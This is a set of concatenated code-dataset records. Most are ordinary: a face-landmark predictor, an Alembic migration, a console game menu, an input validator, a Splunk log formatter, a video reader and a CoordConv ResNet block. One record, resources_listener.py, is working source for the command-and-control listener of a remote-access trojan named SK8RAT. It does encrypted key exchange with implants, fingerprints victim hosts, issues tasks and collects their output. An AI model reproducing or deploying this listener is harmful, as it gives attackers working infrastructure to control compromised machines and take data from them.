blob = cv2.dnn.blobFromImage(\n cv2.resize(image, (300, 300)), 1.0, (300, 300), (104, 177, 123))\n self.detector.setInput(blob)\n\n # Run network\n detections = self.detector.forward()\n\n # Get first plausible detection\n for i in range(0, detections.shape[2]):\n confidence = detections[0, 0, i, 2]\n if (confidence < 0.9):\n continue\n box = detections[0, 0, i, 3:7] * np.array([w, h, w, h])\n box = box.astype(\"int\")\n\n self.vprint(\"Found face bounding box {}, {}, {}, {}\".format(*box))\n return box\n\n self.vprint(\"No faces found\")\n\n def transform_points(self, points, tform, image_height):\n # Extract z and apply inverse transformation\n points = np.reshape(points, [-1, 3]).T\n z = points[2, :].copy() / tform.params[0, 0]\n # invert and offset z in order for points to correspond to Nuke's space\n # and sit in front of the XY plane\n z *= -1\n min_z = z.min()\n z -= min_z\n # Apply the inverse transformation for x and y so the points in 3d space\n # would correspond to the points on the image\n points[2, :] = 1\n points = np.dot(np.linalg.inv(tform.params), points)\n # Invert y\n points[1, :] = image_height - points[1, :]\n points = np.vstack((points[:2, :], z))\n return points.T.flatten()\n\n def predict_face_points(self, image, box):\n self.vprint(\"Predicting face points...\")\n\n (x, y, r, b) = box\n w = r - x\n h = b - y\n\n # Define 3 points of the detected rectangle for similarity transformation\n center = np.array([r - w / 2.0, b - h / 2.0])\n size = int(((w + h) / 2) * 1.6)\n src_points = np.array([\n [center[0] - size / 2, center[1] - size / 2],\n [center[0] - size / 2, center[1] + size / 2],\n [center[0] + size / 2, center[1] - size / 2]\n ])\n\n # Get a similarity transform\n tform = estimate_transform('similarity', src_points, self.dst_points)\n\n # Create an input tensor for point prediction\n input_image = warp(\n image, tform.inverse, output_shape=self.input_shape[1:3])\n input_image = np.asarray(input_image).astype(np.float32)\n input_image = np.reshape(input_image, self.input_shape)\n\n # Run network\n self.interpreter.set_tensor(self.input_index, input_image)\n self.interpreter.invoke()\n output_data = self.interpreter.get_tensor(self.output_index)\n return self.transform_points(\n output_data.flatten(), tform, 
image.shape[0])\n","sub_path":"Models/arcore/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":8478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"121978361","text":"\"\"\"empty message\n\nRevision ID: 13d7f12cd6a4\nRevises: 31c51173d183\nCreate Date: 2014-11-09 01:41:01.448337\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '13d7f12cd6a4'\ndown_revision = '31c51173d183'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.add_column('user', sa.Column('authCode', sa.Integer(), nullable=True))\n op.add_column('user', sa.Column('isAuth', sa.Boolean(), nullable=True))\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('user', 'isAuth')\n op.drop_column('user', 'authCode')\n ### end Alembic commands ###\n","sub_path":"migrations/versions/13d7f12cd6a4_.py","file_name":"13d7f12cd6a4_.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"490973297","text":"#region(to change/fix:)\n# self.__actual_value = min_value + 2 - so that it points at the middle between min and max / not necessarily important /\n# BUG fix the cursor so that after picking a quantity in min_max_item_menu it does not jump to the last option\n#endregion\nimport os\nimport keyboard\nimport time\nfrom options.options_class import Options\nfrom options.map_class import Map\nfrom options.ship_class import Ship\nfrom options.turn_limit_class import Turn\n\nclass Menu:\n def __init__(self, list_menu, logo):\n self.__menu_list = list_menu\n self.__menu_logo = logo\n \n##############################################################################################\n#region(methods for drawing menu items, the logo and the cursor)\n def __draw_arrow(self, arrow_counter_in_menu, arrow_indication,menu_option_edit):\n if menu_option_edit:\n print() \n else:\n if arrow_counter_in_menu == arrow_indication:\n print(\"<-\")\n else:\n print()\n \n def __draw_simple_menu(self, item):\n print(\"{}\".format(item.item_name), end =\" \")\n def __draw_min_max_menu(self, item, menu_min_max_edit):\n if menu_min_max_edit:\n print(\"{} : < {} >\".format(item.item_name, item.actual_value), end =\" \")\n else:\n print(\"{} : {}\".format(item.item_name, item.actual_value), end =\" \")\n #region(__draw_logo(self)\n def __draw_logo(self):\n path = r'c:\\BattleShip\\ascii_alphabet.txt'\n ascii_logo_to_draw = []\n alpha_ascii_list = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','r','s','t','u','w','v','x','y','z',' ','!']\n try:\n with open(path, 'r', encoding=\"UTF-8\") as file:\n content = file.readlines() \n except FileNotFoundError:\n print(\"File does not exist\")\n for i in range(len(content)):\n content[i] = content[i].strip()\n for char_in_logo in self.__menu_logo:\n tmp = 0\n for char in alpha_ascii_list:\n if char == char_in_logo:\n break \n tmp += 1 \n i = 0\n if ascii_logo_to_draw == []:\n for i in range(7):\n ascii_logo_to_draw.append(content[i + (tmp * 7)])\n i += 1\n else:\n for i in range(7):\n ascii_logo_to_draw[i] += content[i + (tmp * 7)]\n i += 1\n for item in ascii_logo_to_draw:\n print(item)\n #endregion\n#endregion\n##############################################################################################\n#region(menu controls, min-max item selection)\n 
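# wraps the cursor index around when it moves past either end of the menu\n def __validation_indication_in_menu(self, 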
arrow_indication, size_max, size_min = 0 ):\n if arrow_indication < size_min:\n return size_max \n elif arrow_indication > size_max:\n return size_min\n else:\n return arrow_indication\n\n def __menu_user_control(self, arrow_indication, size_max, size_min = 0):\n input_key = True\n while input_key:\n if keyboard.is_pressed('down'):\n arrow_indication += 1\n input_key = False \n return self.__validation_indication_in_menu(arrow_indication, size_max, size_min)\n if keyboard.is_pressed('up'):\n arrow_indication -= 1\n input_key = False \n return self.__validation_indication_in_menu(arrow_indication, size_max, size_min)\n if keyboard.is_pressed('left'):\n arrow_indication = 100\n input_key = False \n return arrow_indication\n if keyboard.is_pressed('right'):\n arrow_indication = -100\n input_key = False \n return arrow_indication\n \n def __menu_min_max_user_control(self, actual_value, size_max, size_min):\n input_key = True\n while input_key:\n if keyboard.is_pressed('down'):\n actual_value -= 1\n input_key = False \n if actual_value < size_min:\n return 0\n else:\n return -1\n if keyboard.is_pressed('up'):\n actual_value += 1\n input_key = False \n if actual_value > size_max:\n return 0\n else:\n return 1\n if keyboard.is_pressed('right'):\n actual_value = -100\n input_key = False \n return actual_value \n#endregion\n##############################################################################################\n#region(main method of the class: use_menu)\n def use_menu(self):\n arrow_indication = 0 # default cursor position\n tmp_arrow_indication = 0\n size_menu = len(self.__menu_list) - 1\n run_menu = True\n menu_return_value = None\n menu_min_max_edit = False\n menu_min_max_object = None\n\n while run_menu:\n os.system(\"cls || clear\")\n self.__draw_logo()\n\n arrow_counter_in_menu = 0\n for item in self.__menu_list: \n if isinstance(item, simple_item_menu):\n self.__draw_simple_menu(item)\n self.__draw_arrow(arrow_counter_in_menu, arrow_indication,menu_min_max_edit) \n elif isinstance(item, min_max_item_menu):\n \n if arrow_counter_in_menu == arrow_indication and menu_min_max_edit:\n self.__draw_min_max_menu(item, True)\n else:\n self.__draw_min_max_menu(item, False)\n self.__draw_arrow(arrow_counter_in_menu, arrow_indication,menu_min_max_edit)\n arrow_counter_in_menu += 1\n\n if menu_min_max_edit:\n tmp_arrow_indication = self.__menu_min_max_user_control(menu_min_max_object.actual_value, menu_min_max_object.max_value, menu_min_max_object.min_value) \n else: \n tmp_arrow_indication = self.__menu_user_control(arrow_indication,size_menu) \n \n if tmp_arrow_indication >= 100 and not menu_min_max_edit: \n item = self.__menu_list[arrow_indication]\n\n if isinstance(item, simple_item_menu): \n menu_return_value = item.item_value\n run_menu = False\n elif isinstance(item, min_max_item_menu): \n menu_min_max_edit = True\n menu_min_max_object = item\n tmp_arrow_indication = 0\n\n if tmp_arrow_indication <= -100:\n menu_min_max_edit = False\n\n if menu_min_max_edit:\n menu_min_max_object.actual_value += tmp_arrow_indication \n else:\n arrow_indication = self.__validation_indication_in_menu(tmp_arrow_indication, size_menu)\n \n time.sleep(0.21) \n \n return menu_return_value\n#endregion \n##############################################################################################\n#region(menu classes/types)\nclass simple_item_menu:\n def __init__(self, item_menu_name, menu_return_value):\n self.__item_menu_name = item_menu_name\n self.__item_menu_value = menu_return_value\n @property\n def 
item_name(self):\n return self.__item_menu_name\n @property\n def item_value(self):\n return self.__item_menu_value\n\nclass min_max_item_menu:\n #menu_return_value\n def __init__(self, item_menu_name, min_value, max_value, option_object):\n self.__item_menu_name = item_menu_name \n self.__min_value = min_value\n self.__max_value = max_value\n self.__option_object = option_object\n @property\n def min_value(self):\n return self.__min_value\n @property\n def max_value(self):\n return self.__max_value\n @property\n def item_name(self):\n return self.__item_menu_name\n \n @property\n def actual_value(self):\n if isinstance(self.__option_object, Map):\n return self.__option_object.map_size \n if isinstance(self.__option_object, Ship):\n return self.__option_object.fleet_size \n if isinstance(self.__option_object, Turn):\n return self.__option_object.turn_limit\n\n @actual_value.setter\n def actual_value(self, value):\n if isinstance(self.__option_object, Map):\n self.__option_object.map_size = value\n if isinstance(self.__option_object, Ship):\n self.__option_object.fleet_size = value\n if isinstance(self.__option_object, Turn):\n self.__option_object.turn_limit = value\n#endregion\n##############################################################################################\n\n\n","sub_path":"menu_class.py","file_name":"menu_class.py","file_ext":"py","file_size_in_byte":9154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"68935571","text":"#!/usr/bin/python\nfrom sys import stdin\nimport re\nimport sys\n\ninteger = \"(0|-?[1-9]\\d*)\"\noneint = re.compile(integer + \"\\n\")\nmanyint = re.compile(\"({0} )*{0}\\n\".format(integer))\n\nline = stdin.readline()\nassert oneint.match(line)\nn = int(line)\nassert 1 <= n <= 10 ** 5\n\nline = stdin.readline()\nassert manyint.match(line)\na = list(map(int, line.split()))\nassert len(a) == n\nfor x in a:\n assert 1 <= x <= 10 ** 6\n\nassert len(stdin.readline()) == 0\nsys.exit(42)\n","sub_path":"ncpc2013/trees/input_format_validators/validate.py","file_name":"validate.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"260475913","text":"import logging\r\nimport traceback\r\n\r\n\r\nclass SplunkFormatter(logging.Formatter):\r\n \"\"\"\r\n Class to create Splunk-compatible logs\r\n \"\"\"\r\n def __init__(self, logging_app, project, reporter, fmt=None, datefmt=None, style='%', **extras):\r\n \"\"\"\r\n\r\n :param logging_app: logger=\r\n :param project: project=\r\n :param reporter: reporter=\r\n :param fmt:\r\n :param datefmt:\r\n :param style:\r\n :param extras: any additional data to be added to Splunk event\r\n \"\"\"\r\n self.project = project\r\n self.reporter = reporter\r\n self.logging_app = logging_app\r\n self.extras = extras\r\n super(SplunkFormatter, self).__init__(fmt=fmt, datefmt=datefmt, style=style)\r\n\r\n def format(self, record):\r\n\r\n def jsn(item: str) -> str:\r\n return str(item).replace('\"', '\\\"')\r\n\r\n event = dict({'logger': self.logging_app,\r\n 'level': record.levelname,\r\n 'reporter': self.reporter,\r\n 'project': self.project,\r\n 'module': record.module,\r\n 'action': record.funcName,\r\n 'result': jsn(record.msg)})\r\n if self.extras:\r\n extras = {k: jsn(v) for (k, v) in self.extras.items()}\r\n event.update(extras)\r\n if record.exc_info:\r\n event.update({'traceback': ''.join(traceback.format_exception(*record.exc_info))})\r\n return 
event","sub_path":"tm4j_adapter/classes/SplunkFormatter.py","file_name":"SplunkFormatter.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"605085228","text":"from flask_restful import Resource\nfrom flask import request\nfrom models_listener import (ListenerModel, TaskModel, SK8RATModel)\nfrom nacl.public import SealedBox\nimport nacl.secret\nimport nacl.utils\nimport base64\nimport random\nimport string\nimport json\n\n\n# /stage0\nclass NegotiateSessionKey(Resource):\n def post(self):\n # Get raw request\n request_raw = request.data.decode(\"UTF-8\")\n\n # Split by \":\"\n post_data = request_raw.split(\":\")\n guid = post_data[0]\n nonce = base64.b64decode(post_data[1])\n ciphertext = base64.b64decode(post_data[2])\n\n # Grab shared key from listener\n Listener = ListenerModel.query.filter(ListenerModel.listener_type == \"http\").first()\n sharedkey = base64.b64decode(Listener.shared_key)\n\n # Decode ciphertext (client_publickey) using pynacl\n box = nacl.secret.SecretBox(sharedkey)\n client_publickey = box.decrypt(ciphertext, nonce)\n\n # Generate final session key\n session_key = nacl.utils.random(nacl.secret.SecretBox.KEY_SIZE)\n\n # Write SK8RAT to database with agent name + b64(sessionkey)\n new_SK8RAT = SK8RATModel(\n name=''.join(random.choices(string.ascii_uppercase + string.digits, k=15)),\n guid=guid,\n session_key=base64.b64encode(session_key).decode(\"UTF-8\"),\n session_cookie=''.join(random.choices(string.ascii_uppercase + string.digits, k=15)),\n external_ip=request.remote_addr\n )\n new_SK8RAT.save_to_db()\n\n # Use sealed box with (client_publickey) to send session key to SK8RAT\n publickey = nacl.public.PublicKey(client_publickey)\n sealed_box = SealedBox(publickey)\n encrypted = sealed_box.encrypt(session_key)\n\n return base64.b64encode(encrypted).decode(\"UTF-8\")\n\n\n# /stage1\nclass ChallengeResponseOne(Resource):\n def post(self):\n # Get raw request\n request_raw = request.data.decode(\"UTF-8\")\n\n # Split by \":\"\n post_data = request_raw.split(\":\")\n guid = post_data[0]\n nonce = base64.b64decode(post_data[1])\n ciphertext = base64.b64decode(post_data[2])\n\n # Obtain sessionkey from database\n SK8RAT = SK8RATModel.query.filter(SK8RATModel.guid == guid).first()\n session_key = base64.b64decode(SK8RAT.session_key)\n\n # Decode ciphertext using pynacl\n box = nacl.secret.SecretBox(session_key)\n client_challenge = box.decrypt(ciphertext, nonce)\n\n # Stuff client and server challenge into db\n server_challenge = nacl.utils.random(4)\n SK8RAT.client_challenge = base64.b64encode(client_challenge).decode(\"UTF-8\")\n SK8RAT.server_challenge = base64.b64encode(server_challenge).decode(\"UTF-8\")\n SK8RAT.save_to_db()\n\n # Prepare server response K[client_challenge + server_challenge]\n message = client_challenge + server_challenge\n box = nacl.secret.SecretBox(session_key)\n nonce = nacl.utils.random(nacl.secret.SecretBox.NONCE_SIZE)\n encrypted = box.encrypt(message, nonce)\n ciphertext = encrypted.ciphertext\n ciphertext_b64 = base64.b64encode(ciphertext).decode(\"UTF-8\")\n nonce_b64 = base64.b64encode(nonce).decode(\"UTF-8\")\n server_response = nonce_b64 + \":\" + ciphertext_b64\n\n return server_response\n\n\n# /stage2\nclass ChallengeResponseTwo(Resource):\n def post(self):\n # Get raw request\n request_raw = request.data.decode(\"UTF-8\")\n\n # Split by \":\"\n post_data = request_raw.split(\":\")\n guid = post_data[0]\n nonce = 
base64.b64decode(post_data[1])\n ciphertext = base64.b64decode(post_data[2])\n\n # Obtain sessionkey from database\n SK8RAT = SK8RATModel.query.filter(SK8RATModel.guid == guid).first()\n session_key = base64.b64decode(SK8RAT.session_key)\n\n # Obtain server_challenge from database\n server_challenge = base64.b64decode(SK8RAT.server_challenge)\n\n # Decode ciphertext using pynacl\n box = nacl.secret.SecretBox(session_key)\n server_challenge_returned = box.decrypt(ciphertext, nonce)\n\n # return K[session_cookie] if challenge matches, else return 0\n if (server_challenge == server_challenge_returned):\n message = (SK8RAT.session_cookie).encode(\"UTF-8\")\n box = nacl.secret.SecretBox(session_key)\n nonce_server = nacl.utils.random(nacl.secret.SecretBox.NONCE_SIZE)\n encrypted = box.encrypt(message, nonce_server)\n ciphertext = encrypted.ciphertext\n ciphertext_b64 = base64.b64encode(ciphertext).decode(\"UTF-8\")\n nonce_b64 = base64.b64encode(nonce_server).decode(\"UTF-8\")\n server_response = nonce_b64 + \":\" + ciphertext_b64\n return server_response\n else:\n return {'message': 'Potential MITM!'}\n\n\n# /stage3\nclass FirstCheckIn(Resource):\n def post(self):\n # Get raw request\n request_raw = request.data.decode(\"UTF-8\")\n\n # Split by \":\"\n post_data = request_raw.split(\":\")\n nonce = base64.b64decode(post_data[0])\n ciphertext = base64.b64decode(post_data[1])\n\n # Read session cookie and grab corresponding session key, if cookie is invalid throw error\n session_cookie = request.cookies.get('macaroon')\n SK8RAT = SK8RATModel.query.filter(SK8RATModel.session_cookie == session_cookie).first()\n if (SK8RAT):\n session_key = base64.b64decode(SK8RAT.session_key)\n else:\n return {'message': 'Bad cookie.'}\n\n # Decode ciphertext using pynacl, store as json object\n box = nacl.secret.SecretBox(session_key)\n json_string = box.decrypt(ciphertext, nonce)\n json_blob = json.loads(json_string)\n\n # Parse json object and update database\n SK8RAT.username = json_blob['username']\n SK8RAT.hostname = json_blob['hostname']\n SK8RAT.pid = json_blob['pid']\n SK8RAT.internal_ip = json_blob['internal_ip']\n SK8RAT.admin = json_blob['admin']\n SK8RAT.os = json_blob['os']\n SK8RAT.listener_id = json_blob['listener_id']\n SK8RAT.server_ip = json_blob['server_ip']\n SK8RAT.sleep = json_blob['sleep']\n SK8RAT.jitter = json_blob['jitter']\n SK8RAT.last_seen = json_blob['last_seen']\n SK8RAT.save_to_db()\n\n return 1\n\n\n# /get\nclass SK8RATGet(Resource):\n def get(self):\n # Read session cookie and grab corresponding session key, if cookie is invalid throw error\n session_cookie = request.cookies.get('macaroon')\n SK8RAT = SK8RATModel.query.filter(SK8RATModel.session_cookie == session_cookie).first()\n if (SK8RAT):\n session_key = base64.b64decode(SK8RAT.session_key)\n else:\n return {'message': 'Bad cookie.'}\n\n task = TaskModel.query.filter(TaskModel.guid == SK8RAT.guid).filter(TaskModel.task_status == \"wait\").all() \n\n # Assemble task_id, task, task_status, task_output\n task_id_list = []\n task_list = []\n task_status_list = []\n task_output_list = []\n for x in task:\n task_id_list.append(x.task_id)\n task_list.append(x.task)\n task_status_list.append(x.task_status)\n task_output_list.append(x.task_output)\n\n # Assemble complete message\n # \n # guid\n # last_seen\n # sleep\n # jitter\n # task_id\n # task\n # task_status\n # task_output\n data = {}\n data['guid'] = SK8RAT.guid\n data['last_seen'] = SK8RAT.last_seen\n data['sleep'] = SK8RAT.sleep\n data['jitter'] = SK8RAT.jitter\n 
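# task fields travel as parallel lists: task_id[i] pairs with task[i],\n # task_status[i] and task_output[i], so one payload covers every queued task\n 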
data['task_id'] = task_id_list\n data['task'] = task_list\n data['task_status'] = task_status_list\n data['task_output'] = task_output_list\n\n # Server response assembled\n json_data = json.dumps(data)\n\n # Encrypt server response\n message = json_data\n box = nacl.secret.SecretBox(session_key)\n nonce = nacl.utils.random(nacl.secret.SecretBox.NONCE_SIZE)\n encrypted = box.encrypt(message.encode(\"UTF-8\"), nonce)\n ciphertext = encrypted.ciphertext\n ciphertext_b64 = base64.b64encode(ciphertext).decode(\"UTF-8\")\n nonce_b64 = base64.b64encode(nonce).decode(\"UTF-8\")\n server_response = nonce_b64 + \":\" + ciphertext_b64\n\n return server_response\n\n\n# /post\nclass SK8RATPost(Resource):\n def post(self):\n # Get raw request\n request_raw = request.data.decode(\"UTF-8\")\n\n # Split by \":\"\n post_data = request_raw.split(\":\")\n nonce = base64.b64decode(post_data[0])\n ciphertext = base64.b64decode(post_data[1])\n\n # Read session cookie and grab corresponding session key, if cookie is invalid throw error\n session_cookie = request.cookies.get('macaroon')\n SK8RAT = SK8RATModel.query.filter(SK8RATModel.session_cookie == session_cookie).first()\n if (SK8RAT):\n session_key = base64.b64decode(SK8RAT.session_key)\n else:\n return {'message': 'Bad cookie.'}\n\n # Decode ciphertext using pynacl, store as json object\n box = nacl.secret.SecretBox(session_key)\n json_string = box.decrypt(ciphertext, nonce)\n json_blob = json.loads(json_string)\n\n # \n # guid\n # last_seen\n # sleep\n # jitter\n # task_id\n # task\n # task_status\n # task_output\n\n # Update last_seen in database\n SK8RAT.last_seen = json_blob['last_seen']\n SK8RAT.save_to_db()\n\n # Loop through and match task_id and guid to retrieve correct TaskModel\n counter = 0\n for x in json_blob['task_id']:\n Task = TaskModel.query.filter(TaskModel.guid == SK8RAT.guid).filter(TaskModel.task_id == x).first()\n Task.task_status = json_blob['task_status'][counter]\n Task.task_output = json_blob['task_output'][counter]\n Task.save_to_db()\n counter = counter + 1\n","sub_path":"resources_listener.py","file_name":"resources_listener.py","file_ext":"py","file_size_in_byte":10140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"168897312","text":"import cv2\nimport time\nfrom timeit import default_timer as timer\n\nclass Video:\n def __init__(self, videoDir):\n \"\"\"\n\n :param videoDir: path of the video file to open\n \"\"\"\n self.cap = cv2.VideoCapture(videoDir) # open the video capture\n self.isOpened = self.cap.isOpened() # check whether the capture opened successfully\n self.fps = self.cap.get(cv2.CAP_PROP_FPS)\n self.width = int(self.cap.get(cv2.CAP_PROP_FRAME_WIDTH))\n self.height = int(self.cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\n self.nFrame = 0\n self.time = timer()\n\n def getImageFromVideo(self):\n \"\"\"\n\n :return:\n frame, frame number and timestamp, or (None, None, None) when exhausted\n \"\"\"\n if self.isOpened:\n (frameState, frame) = self.cap.read() # read one frame and its status\n if frameState == True:\n t = time.time() # timestamp of the current frame\n self.nFrame += 1\n nF = self.nFrame\n return frame, nF, t\n else:\n return None, None, None\n else:\n return None, None, None\n\n\nif __name__ == '__main__':\n avi = Video(\"E:\\\\1\\\\1.avi\")\n frame, nF, t = avi.getImageFromVideo()\n while frame is not None:\n \"\"\"\n Then write your frame process code here.\n \"\"\"\n cv2.imshow(\"avi\", frame)\n cv2.waitKey(10)\n frame, nF, t = avi.getImageFromVideo()\n\n\"\"\" \ndef getImageFromVideo(VideoDir):\n cap = cv2.VideoCapture(VideoDir) # open the video capture\n isOpened = cap.isOpened() # check whether it opened\n # read video metadata\n fps = cap.get(cv2.CAP_PROP_FPS)\n 
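# frame dimensions come straight from the capture properties\n width = 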
int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\n height = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\n imageNum = 0\n while (isOpened):\n if imageNum / fps == 2: # only keep frames from the first two seconds of video\n break\n else:\n imageNum = imageNum + 1\n (frameState, frame) = cap.read() # read each frame and its status\n fileName = 'image' + str(imageNum) + '.jpg' # output path\n\n if frameState == True:\n cv2.imwrite(fileName, frame, [cv2.IMWRITE_JPEG_QUALITY, 100])\n print(fileName + \" successfully written\") # report the write status\n print('finish!')\n\"\"\"\n\n\n","sub_path":"src/Vision/新建文件夹/video.py","file_name":"video.py","file_ext":"py","file_size_in_byte":2196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"212962384","text":"import torch\nimport torch.nn as nn\nimport torch.nn.modules.conv as conv\nfrom torch import Tensor\nfrom typing import Type, Any, Callable, Union, List, Optional\n\nclass AddCoords(nn.Module):\n def __init__(self, rank, with_r=False, use_cuda=False):\n super(AddCoords, self).__init__()\n self.rank = rank\n self.with_r = with_r\n self.use_cuda = use_cuda\n\n def forward(self, input_tensor):\n \"\"\"\n :param input_tensor: shape (N, C_in, H, W)\n :return:\n \"\"\"\n if self.rank == 1:\n batch_size_shape, channel_in_shape, dim_x = input_tensor.shape\n xx_range = torch.arange(dim_x, dtype=torch.int32)\n xx_channel = xx_range[None, None, :]\n\n xx_channel = xx_channel.float() / (dim_x - 1)\n xx_channel = xx_channel * 2 - 1\n xx_channel = xx_channel.repeat(batch_size_shape, 1, 1)\n\n if torch.cuda.is_available() and self.use_cuda:\n input_tensor = input_tensor.cuda()\n xx_channel = xx_channel.cuda()\n out = torch.cat([input_tensor, xx_channel], dim=1)\n\n if self.with_r:\n rr = torch.sqrt(torch.pow(xx_channel - 0.5, 2))\n out = torch.cat([out, rr], dim=1)\n\n elif self.rank == 2:\n batch_size_shape, channel_in_shape, dim_y, dim_x = input_tensor.shape\n xx_ones = torch.ones([1, 1, 1, dim_x], dtype=torch.int32)\n yy_ones = torch.ones([1, 1, 1, dim_y], dtype=torch.int32)\n\n xx_range = torch.arange(dim_y, dtype=torch.int32)\n yy_range = torch.arange(dim_x, dtype=torch.int32)\n xx_range = xx_range[None, None, :, None]\n yy_range = yy_range[None, None, :, None]\n\n xx_channel = torch.matmul(xx_range, xx_ones)\n yy_channel = torch.matmul(yy_range, yy_ones)\n\n # transpose y\n yy_channel = yy_channel.permute(0, 1, 3, 2)\n\n xx_channel = xx_channel.float() / (dim_y - 1)\n yy_channel = yy_channel.float() / (dim_x - 1)\n\n xx_channel = xx_channel * 2 - 1\n yy_channel = yy_channel * 2 - 1\n\n xx_channel = xx_channel.repeat(batch_size_shape, 1, 1, 1)\n yy_channel = yy_channel.repeat(batch_size_shape, 1, 1, 1)\n\n if torch.cuda.is_available() and self.use_cuda:\n input_tensor = input_tensor.cuda()\n xx_channel = xx_channel.cuda()\n yy_channel = yy_channel.cuda()\n out = torch.cat([input_tensor, xx_channel, yy_channel], dim=1)\n\n if self.with_r:\n rr = torch.sqrt(torch.pow(xx_channel - 0.5, 2) + torch.pow(yy_channel - 0.5, 2))\n out = torch.cat([out, rr], dim=1)\n\n elif self.rank == 3:\n batch_size_shape, channel_in_shape, dim_z, dim_y, dim_x = input_tensor.shape\n xx_ones = torch.ones([1, 1, 1, 1, dim_x], dtype=torch.int32)\n yy_ones = torch.ones([1, 1, 1, 1, dim_y], dtype=torch.int32)\n zz_ones = torch.ones([1, 1, 1, 1, dim_z], dtype=torch.int32)\n\n xy_range = torch.arange(dim_y, dtype=torch.int32)\n xy_range = xy_range[None, None, None, :, None]\n\n yz_range = torch.arange(dim_z, dtype=torch.int32)\n yz_range = yz_range[None, None, None, :, None]\n\n zx_range = torch.arange(dim_x, dtype=torch.int32)\n 
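# reshape each 1-D range to rank 5 so the matmuls below broadcast it\n # across the remaining axes into full coordinate volumes\n 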
zx_range = zx_range[None, None, None, :, None]\n\n xy_channel = torch.matmul(xy_range, xx_ones)\n xx_channel = torch.cat([xy_channel + i for i in range(dim_z)], dim=2)\n\n yz_channel = torch.matmul(yz_range, yy_ones)\n yz_channel = yz_channel.permute(0, 1, 3, 4, 2)\n yy_channel = torch.cat([yz_channel + i for i in range(dim_x)], dim=4)\n\n zx_channel = torch.matmul(zx_range, zz_ones)\n zx_channel = zx_channel.permute(0, 1, 4, 2, 3)\n zz_channel = torch.cat([zx_channel + i for i in range(dim_y)], dim=3)\n\n if torch.cuda.is_available() and self.use_cuda:\n input_tensor = input_tensor.cuda()\n xx_channel = xx_channel.cuda()\n yy_channel = yy_channel.cuda()\n zz_channel = zz_channel.cuda()\n out = torch.cat([input_tensor, xx_channel, yy_channel, zz_channel], dim=1)\n\n if self.with_r:\n rr = torch.sqrt(torch.pow(xx_channel - 0.5, 2) +\n torch.pow(yy_channel - 0.5, 2) +\n torch.pow(zz_channel - 0.5, 2))\n out = torch.cat([out, rr], dim=1)\n else:\n raise NotImplementedError\n\n return out\n\nclass CoordConv1d(conv.Conv1d):\n def __init__(self, in_channels, out_channels, kernel_size, stride=1,\n padding=1, dilation=1, groups=1, bias=True, with_r=False, use_cuda=False):\n super(CoordConv1d, self).__init__(in_channels, out_channels, kernel_size,\n stride, padding, dilation, groups, bias)\n self.rank = 1\n self.addcoords = AddCoords(self.rank, with_r, use_cuda=use_cuda)\n self.conv = nn.Conv1d(in_channels + self.rank + int(with_r), out_channels,\n kernel_size, stride, padding, dilation, groups, bias)\n\n def forward(self, input_tensor):\n \"\"\"\n input_tensor_shape: (N, C_in, L)\n output_tensor_shape: (N, C_out, L_out)\n :return: CoordConv1d result\n \"\"\"\n out = self.addcoords(input_tensor)\n out = self.conv(out)\n\n return out\n\nchannel_size = 12\n\ndef conv3x3(in_planes: int, out_planes: int, stride: int = 1, groups: int = 1, dilation: int = 1) -> nn.Conv1d:\n \"\"\"3x3 convolution with padding\"\"\"\n return nn.Conv1d(in_planes, out_planes, kernel_size=3, stride=stride,\n padding=dilation, groups=groups, bias=False, dilation=dilation)\n\n\ndef conv1x1(in_planes: int, out_planes: int, stride: int = 1) -> nn.Conv1d:\n \"\"\"1x1 convolution\"\"\"\n return nn.Conv1d(in_planes, out_planes, kernel_size=1, stride=stride, bias=False)\n\n\nclass BasicBlock(nn.Module):\n expansion: int = 1\n\n def __init__(\n self,\n inplanes: int,\n planes: int,\n stride: int = 1,\n downsample: Optional[nn.Module] = None,\n groups: int = 1,\n base_width: int = 64,\n dilation: int = 1,\n norm_layer: Optional[Callable[..., nn.Module]] = None\n ) -> None:\n super(BasicBlock, self).__init__()\n if norm_layer is None:\n norm_layer = nn.BatchNorm1d\n if groups != 1 or base_width != 64:\n raise ValueError('BasicBlock only supports groups=1 and base_width=64')\n if dilation > 1:\n raise NotImplementedError(\"Dilation > 1 not supported in BasicBlock\")\n # Both self.conv1 and self.downsample layers downsample the input when stride != 1\n self.conv1 = conv3x3(inplanes, planes, stride)\n self.bn1 = norm_layer(planes)\n self.relu = nn.ReLU(inplace=True)\n self.conv2 = conv3x3(planes, planes)\n self.bn2 = norm_layer(planes)\n self.downsample = downsample\n self.stride = stride\n\n self.coordconv = CoordConv1d(inplanes, planes, 3 ,stride=stride, with_r=True)\n\n def forward(self, x: Tensor) -> Tensor:\n identity = x\n\n out = self.coordconv(x)\n #out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n\n if self.downsample is not None:\n 
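# project the shortcut so its shape matches the residual branch\n identity = 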
